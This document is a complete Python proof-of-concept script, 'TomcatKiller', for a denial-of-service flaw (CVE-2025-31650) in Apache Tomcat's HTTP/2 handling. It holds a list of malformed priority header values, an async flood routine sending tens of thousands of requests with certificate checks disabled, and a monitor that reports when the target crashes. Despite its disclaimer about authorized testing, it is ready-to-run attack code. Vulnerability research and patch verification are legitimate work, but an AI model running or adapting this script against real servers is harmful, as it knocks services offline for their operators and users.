# TomcatKiller - CVE-2025-31650 PoC # # Author: Tunahan Tekeoğlu (@tunahantekeoglu) # Purpose: Educational use and authorized security testing only # # Description: # This script targets a known memory exhaustion vulnerability in Apache Tomcat # (CVE-2025-31650) by sending malformed HTTP/2 priority headers. # # ⚠️ Disclaimer: # This proof-of-concept is provided for educational purposes and internal security # assessments. Do NOT use this script against systems without explicit permission. import httpx import asyncio import random import urllib.parse import sys import socket import argparse from colorama import init, Fore, Style init() class TomcatKiller: def __init__(self): self.success_count = 0 self.error_count = 0 self.invalid_priorities = [ "u=-1, q=2", "u=4294967295, q=-1", "u=-2147483648, q=1.5", "u=0, q=invalid", "u=1/0, q=NaN", "u=1, q=2, invalid=param", "", "u=1, q=1, u=2", "u=99999999999999999999, q=0", "u=-99999999999999999999, q=0", "u=, q=", "u=1, q=1, malformed", "u=1, q=, invalid", "u=-1, q=4294967295", "u=invalid, q=1", "u=1, q=1, extra=\ud83d\ude08", "u=1, q=1; malformed", "u=1, q=1, =invalid", "u=0, q=0, stream=invalid", "u=1, q=1, priority=recursive", "u=1, q=1, %invalid%", "u=0, q=0, null=0", ] async def validate_url(self, url): try: parsed_url = urllib.parse.urlparse(url) if not parsed_url.scheme or not parsed_url.hostname: raise ValueError("Invalid URL format. Use http:// or https://") host = parsed_url.hostname port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == 'https' else 80) return host, port except Exception: print(f"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}") sys.exit(1) async def check_http2_support(self, host, port): async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client: try: response = await client.get(f"https://{host}:{port}/", headers={"user-agent": "TomcatKiller"}) server_header = response.headers.get("server", "") print(f"{Fore.CYAN}[i] Server Header: {server_header}{Style.RESET_ALL}") if "tomcat" in server_header.lower(): print(f"{Fore.GREEN}[+] Apache Tomcat detected.{Style.RESET_ALL}") else: print(f"{Fore.YELLOW}[!] Tomcat not clearly visible in Server header. Manual verification recommended.{Style.RESET_ALL}") if response.http_version == "HTTP/2": print(f"{Fore.GREEN}[+] HTTP/2 supported. Target may be vulnerable.{Style.RESET_ALL}") return True else: print(f"{Fore.RED}[-] HTTP/2 not supported. Exploit will not work.{Style.RESET_ALL}") return False except Exception: print(f"{Fore.RED}[-] Failed to connect to {host}:{port}.{Style.RESET_ALL}") return False async def send_invalid_priority_request(self, host, port, num_requests, task_id): async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client: url = f"https://{host}:{port}/" for _ in range(num_requests): headers = { "priority": random.choice(self.invalid_priorities), "user-agent": f"TomcatKiller-{task_id}-{random.randint(1, 1000000)}", "cache-control": "no-cache", "accept": f"*/*; q={random.random()}" } try: await client.get(url, headers=headers) self.success_count += 1 except Exception: self.error_count += 1 async def monitor_server(self, host, port): while True: try: with socket.create_connection((host, port), timeout=2): print(f"{Fore.YELLOW}Target {host}:{port} is still reachable.{Style.RESET_ALL}") except Exception: print(f"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}") break await asyncio.sleep(2) async def run_attack(self, host, port, num_tasks, requests_per_task): print(f"{Fore.GREEN}Launching exploit against {host}:{port}...{Style.RESET_ALL}") print(f"Tasks: {num_tasks}, Requests per task: {requests_per_task}") monitor_task = asyncio.create_task(self.monitor_server(host, port)) tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)] await asyncio.gather(*tasks) monitor_task.cancel() total_requests = num_tasks * requests_per_task success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0 print(f"\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}") print(f"Target: {host}:{port}") print(f"Total Requests: {total_requests}") print(f"Successful: {self.success_count}, Failed: {self.error_count}") print(f"Success Rate: {success_rate:.2f}%") print(f"{Fore.MAGENTA}========================={Style.RESET_ALL}") async def main(): parser = argparse.ArgumentParser(description="PoC for CVE-2025-31650 - Apache Tomcat HTTP/2 DoS") parser.add_argument("--target", required=True, help="Target URL (e.g., https://example.com:8443)") parser.add_argument("--check-only", action="store_true", help="Only check HTTP/2 and Server header") parser.add_argument("--exploit", action="store_true", help="Run the actual exploit") parser.add_argument("--tasks", type=int, default=50, help="Number of async tasks (default: 50)") parser.add_argument("--requests", type=int, default=5000, help="Requests per task (default: 5000)") args = parser.parse_args() tk = TomcatKiller() host, port = await tk.validate_url(args.target) if not await tk.check_http2_support(host, port): sys.exit(1) if args.check_only: sys.exit(0) if args.exploit: await tk.run_attack(host, port, args.tasks, args.requests) else: print(f"{Fore.YELLOW}[-] No action specified. Use --check-only or --exploit{Style.RESET_ALL}") parser.print_help() sys.exit(1) if __name__ == "__main__": try: asyncio.run(main()) print(f"{Fore.GREEN}Done.{Style.RESET_ALL}") except KeyboardInterrupt: print(f"{Fore.YELLOW}Interrupted by user.{Style.RESET_ALL}") sys.exit(0) except Exception as e: print(f"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}") sys.exit(1)